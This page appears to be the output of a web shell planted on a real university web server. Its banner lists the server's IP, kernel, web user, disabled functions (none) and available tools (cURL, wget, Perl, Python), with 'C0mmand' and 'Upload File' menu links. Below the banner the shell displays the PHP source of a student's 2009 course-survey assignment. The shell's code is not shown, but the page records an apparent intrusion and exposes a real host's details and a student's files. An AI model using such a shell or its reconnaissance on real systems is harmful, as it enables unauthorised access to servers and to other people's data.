Server IP : 172.16.15.8 / Your IP : 3.144.101.75 Web Server : Apache System : Linux zeus.vwu.edu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Wed Nov 6 14:29:02 UTC 2024 x86_64 User : apache ( 48) PHP Version : 7.2.24 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/slcebula/public_html/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<?php session_start() ?> <!-- Name: Lee Cebula Date: 4/6/09 Instructor: Dr. Wang Title: assign8_2.php Goal: action code for assignment8.html, save the values passed from the last page --> <HTML> <HEAD> <TITLE> assign8_2.php </TITLE> </HEAD> <BODY BGCOLOR=maroon> <FONT COLOR=yellow> <CENTER> <H1> Survey Page </H1> <HR> <BR> </CENTER> <?php $name = $_POST['name']; $gender = $_POST['gender']; $grade = $_POST['grade']; $course = $_POST['course']; $_SESSION['name'] = $name; $_SESSION['gender'] = $gender; $_SESSION['grade'] = $grade; $_SESSION['course'] = $course; ?> <FORM ACTION=assign8_3.php METHOD=post> 1. The course was very valuable to take. <FONT SIZE=2> <P> <INPUT TYPE=radio NAME=q1 VALUE=sa checked>Strongly Agree <P> <INPUT TYPE=radio NAME=q1 VALUE=a>Agree <P> <INPUT TYPE=radio NAME=q1 VALUE=n>Not Agree <P> <INPUT TYPE=radio NAME=q1 VALUE=na>Not Available <P><P> </FONT> 2. The instructor taught the course well. <FONT SIZE=2> <P> <INPUT TYPE=radio NAME=q2 VALUE=sa checked>Strongly Agree <P> <INPUT TYPE=radio NAME=q2 VALUE=a>Agree <P> <INPUT TYPE=radio NAME=q2 VALUE=n>Not Agree <P> <INPUT TYPE=radio NAME=q2 VALUE=na>Not Available <P><P> </FONT> 3. The insructor graded fairly. <FONT SIZE=2> <P> <INPUT TYPE=radio NAME=q3 VALUE=sa checked>Strongly Agree <P> <INPUT TYPE=radio NAME=q3 VALUE=a>Agree <P> <INPUT TYPE=radio NAME=q3 VALUE=n>Not Agree <P> <INPUT TYPE=radio NAME=q3 VALUE=na>Not Available <P><P> </FONT> 4. I would tell a friend to take this course. <FONT SIZE=2> <P> <INPUT TYPE=radio NAME=q4 VALUE=sa checked>Strongly Agree <P> <INPUT TYPE=radio NAME=q4 VALUE=a>Agree <P> <INPUT TYPE=radio NAME=q4 VALUE=n>Not Agree <P> <INPUT TYPE=radio NAME=q4 VALUE=na>Not Available <P><P> </FONT> 5. I would tell a friend to take this course with a different professor. <FONT SIZE=2> <P> <INPUT TYPE=radio NAME=q5 VALUE=sa checked>Strongly Agree <P> <INPUT TYPE=radio NAME=q5 VALUE=a>Agree <P> <INPUT TYPE=radio NAME=q5 VALUE=n>Not Agree <P> <INPUT TYPE=radio NAME=q5 VALUE=na>Not Available <P><P> </FONT> Any additional comments: <P> <TEXTAREA ROWS=5 COLS=50 NAME=comm> Enter here. </TEXTAREA> <P> <INPUT TYPE=submit VALUE=Submit> <INPUT TYPE=reset VALUE=Reset> </FORM> </FONT> </BODY> </HTML>